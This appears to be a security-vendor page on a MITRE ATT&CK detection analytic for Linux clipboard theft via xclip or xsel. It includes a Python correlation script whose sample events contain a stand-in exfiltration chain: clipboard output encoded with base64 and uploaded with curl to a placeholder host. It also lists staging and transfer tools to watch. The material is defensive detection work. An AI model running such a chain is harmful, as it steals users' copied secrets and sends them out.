AN0967: Analytic 0967
Detection of xclip or xsel access to clipboard buffers outside of user terminal context, especially when chained to staging (gzip, base64) or network exfiltration (curl, scp).
Analyst context for executives and security teams
This analytic matters because Linux clipboard access can expose copied secrets, commands, tokens, or operational data if clipboard tools are invoked outside a normal user terminal workflow. The business value is in validating whether SOC and incident response teams can distinguish legitimate desktop clipboard use from suspicious collection and staging behavior, especially when clipboard reads are followed by compression, encoding, or network transfer utilities.
Executive priority
Prioritize this as a Linux endpoint visibility and data-protection validation item. Leaders should ask whether high-value Linux workstations, administrator systems, and developer environments collect enough process and command context to prove whether clipboard access is normal user activity or potential data collection. It is most relevant to operational resilience, incident scoping, insider-risk review, and audit evidence around monitoring of sensitive administrative environments.
Technical view
For Linux platforms, validate monitoring around xclip and xsel execution when the process context is not an interactive user terminal. The supplied analytic highlights higher-risk chaining with staging tools such as gzip or base64 and network transfer tools such as curl or scp. SOC teams should review process lineage, parent process, session or TTY context, command-line arguments where available, and subsequent process/network activity. No ATT&CK tactic, related technique, or official detection logic was supplied, so implementation must be locally defined and tested against normal desktop and automation behavior.
Likely telemetry
- Linux process creation events for xclip and xsel
- Command-line arguments for clipboard, staging, and transfer utilities where collected
- Parent/child process lineage and session or TTY context
- User identity and host context for Linux endpoints
- File creation or pipe activity associated with gzip or base64 staging where available
Detection direction
- Baseline legitimate xclip and xsel use on Linux desktops and administrative workstations before alerting broadly.
- Prioritize alerts where clipboard access occurs outside an interactive terminal or expected desktop session context.
- Increase severity when xclip or xsel activity is closely followed by gzip, base64, curl, or scp execution by the same user or process chain.
- Tune for expected automation, accessibility tools, remote desktop workflows, and developer utilities to reduce false positives.
- Validate that endpoint telemetry preserves parent process, command line, user, and session context; without these fields, this analytic may be weak or noisy.
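The correlation described in the technical view and detection direction above, as an added example that is not part of the ATT&CK analytic or of Glexia's page: it walks a list of Linux process-creation events, treats xclip/xsel without a controlling terminal as the candidate signal, raises severity when the same user runs a staging or transfer tool within a window, and records whether those follow-ups share the clipboard process's lineage. The event schema (ts, pid, ppid, user, tty, comm, cmdline), the 120-second window and the sample events are constructed assumptions; real auditd, eBPF or EDR telemetry carries the same fields under its own names.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional

CLIPBOARD_TOOLS = {"xclip", "xsel"}
STAGING_TOOLS = {"gzip", "base64"}
TRANSFER_TOOLS = {"curl", "scp"}
FOLLOWUP_WINDOW_S = 120.0  # assumed correlation window; tune to the environment


@dataclass
class ProcEvent:
    """One Linux process-creation record. Constructed, simplified schema:
    real auditd EXECVE/SYSCALL or eBPF exec records carry these fields under
    their own names."""
    ts: float             # seconds since epoch
    pid: int
    ppid: int
    user: str
    tty: Optional[str]    # controlling terminal; "?"/"(none)"/None when absent
    comm: str             # executable basename
    cmdline: str


def has_terminal(ev: ProcEvent) -> bool:
    """auditd and ps report a missing controlling terminal as '?' or '(none)'."""
    return ev.tty not in (None, "", "?", "(none)")


def ancestors(pid: int, by_pid: Dict[int, ProcEvent], max_depth: int = 8) -> List[int]:
    """Walk ppid links upward through the events we hold (process lineage)."""
    chain: List[int] = []
    cur = by_pid.get(pid)
    while cur is not None and len(chain) < max_depth:
        chain.append(cur.ppid)
        cur = by_pid.get(cur.ppid)
    return chain


def same_process_chain(a: ProcEvent, b: ProcEvent, by_pid: Dict[int, ProcEvent]) -> bool:
    """True when one process descends from the other or both share an
    ancestor other than init (pid 1), which every process shares."""
    a_anc, b_anc = set(ancestors(a.pid, by_pid)), set(ancestors(b.pid, by_pid))
    return b.pid in a_anc or a.pid in b_anc or bool((a_anc & b_anc) - {0, 1})


def detect(events: List[ProcEvent]) -> List[dict]:
    """Apply the detection direction: a clipboard tool without a terminal is
    medium; raise to high when the same user runs staging or transfer tools
    within the window, and record whether they sit in the same process chain."""
    events = sorted(events, key=lambda e: e.ts)
    by_pid = {e.pid: e for e in events}
    alerts: List[dict] = []
    for i, ev in enumerate(events):
        if ev.comm not in CLIPBOARD_TOOLS or has_terminal(ev):
            continue  # interactive terminal use is the baseline, not alerted here
        followups: List[str] = []
        same_chain = False
        for later in events[i + 1:]:
            if later.ts - ev.ts > FOLLOWUP_WINDOW_S:
                break
            if later.user == ev.user and later.comm in STAGING_TOOLS | TRANSFER_TOOLS:
                followups.append(later.comm)
                same_chain = same_chain or same_process_chain(ev, later, by_pid)
        alerts.append({
            "pid": ev.pid,
            "user": ev.user,
            "cmdline": ev.cmdline,
            "followups": followups,
            "same_chain": same_chain,
            "severity": "high" if followups else "medium",
        })
    return alerts


# Constructed sample telemetry: an interactive xclip (benign baseline), a
# non-terminal xsel chained to base64 and curl, and a lone non-terminal xclip.
SAMPLE_EVENTS = [
    ProcEvent(1000.0, 100, 1, "alice", "pts/0", "bash", "bash"),
    ProcEvent(1001.0, 101, 100, "alice", "pts/0", "xclip", "xclip -o -selection clipboard"),
    ProcEvent(1050.0, 200, 1, "bob", "?", "python3", "python3 /tmp/collect.py"),
    ProcEvent(1051.0, 201, 200, "bob", "?", "xsel", "xsel --clipboard --output"),
    ProcEvent(1052.0, 202, 200, "bob", "?", "base64", "base64 -w0"),
    ProcEvent(1055.0, 203, 200, "bob", "?", "curl", "curl -s -T - https://example.invalid/upload"),
    ProcEvent(1300.0, 300, 250, "carol", "?", "xclip", "xclip -selection clipboard"),
]


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

On the sample input the xsel event for bob is reported as high with follow-ups base64 and curl in the same process chain, and carol's lone xclip as medium; alice's terminal-backed xclip is never raised. Note that processes started from a graphical desktop session also lack a controlling terminal, so in production the "no TTY" test alone will fire on ordinary clipboard managers and accessibility tools; the baselining and tuning steps above (parent process allowlists, expected desktop session parents) are what keep the medium tier from becoming noise.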
Mitigation priorities
- Confirm Linux endpoint logging coverage first, especially for systems used by administrators, engineers, or personnel handling sensitive data.
- Apply least-privilege and software governance so clipboard and transfer utilities are available only where operationally needed.
- Harden monitoring around outbound transfer paths and unusual command-line staging from user workstations.
- Use incident response playbooks that preserve process lineage, command history where available, user session details, and network evidence when suspicious clipboard access is observed.
- Review user awareness and handling procedures for copying sensitive credentials or operational data into clipboards on monitored Linux systems.
Analyst notes and limits
This object is a MITRE detection analytic, not a technique description. The useful signal is the combination of Linux clipboard utilities, non-terminal context, and nearby staging or network transfer behavior. There are no supplied relationships, aliases, labels, tactics, or official detection logic, so local telemetry quality and environmental baselining determine practical value.
The source fields do not provide ATT&CK tactics, related techniques, data sources, detection pseudocode, mitigations, impact claims, attribution, or evidence of active exploitation. Recommendations are limited to conservative defensive validation derived from the official description and Linux platform scope.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the ATT&CK resources page (Updates).
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | d35781e31502… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] mitre-attack: AN0967 (source URL)
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.